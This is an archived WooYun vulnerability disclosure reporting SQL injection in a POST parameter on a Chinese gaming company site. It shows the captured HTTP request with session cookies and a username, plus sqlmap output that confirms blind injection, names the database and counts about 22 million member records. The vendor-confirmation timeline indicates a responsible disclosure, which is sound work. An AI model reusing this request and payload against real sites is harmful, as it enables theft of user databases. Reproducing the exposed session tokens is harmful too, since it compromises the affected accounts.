乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-19: 细节已通知厂商并且等待厂商处理中 2015-03-19: 厂商已经确认,细节仅向厂商公开 2015-03-29: 细节向核心白帽子及相关领域专家公开 2015-04-08: 细节向普通白帽子公开 2015-04-18: 细节向实习白帽子公开 2015-05-03: 细节向公众公开
07073游戏某站SQL注入第四次影响22044669用户数据很不好意思,又来了,但反过来说,我来提出问题总比其他人拖走数据库好得多我从不脱人家裤子,也不窥探,社会主义好青年
company.07073.com
POST /click HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Accept: */*Origin: http://company.07073.comReferer: http://company.07073.com/8729.htmlX-Requested-With: XMLHttpRequestAccept-Language: en-us,en;q=0.5Host: company.07073.comCookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e901c1f669d2d643c4ee936468d6509c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22125.78.248.83%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426734513%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D30bfde05526ae61ba411a0babcd6cadf; CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426725501; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426729241; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b2315a9a9db5140b17c8b734a0bfde8e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426729229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dcdfc00377f4a29347793a5622bcc27e9; PHPSESSID=98946e97e1d599248d8ec8b875b9a45e; from_url=http%3A//v.07073.com/Accept-Encoding: gzip, deflateContent-Length: 19Content-Type: application/x-www-form-urlencodedcid=1
current user: 'amdbuser@%'current database: 'kf07073'[11:46:05] [INFO] testing connection to the target URLyou provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] ysqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: cid (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=1 AND 5900=5900---[11:46:07] [INFO] testing MySQL[11:46:07] [INFO] confirming MySQL[11:46:07] [INFO] the back-end DBMS is MySQLweb server operating system: Windows NT 4.0back-end DBMS: MySQL >= 5.0.0[11:46:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[11:46:07] [INFO] retrieved: 22044669Database: bbs073+------------+---------+| Table | Entries |+------------+---------+| uc_members | 22044669 |+------------+---------+
危害等级:高
漏洞Rank:20
确认时间:2015-03-19 13:15
感谢提供漏洞信息
暂无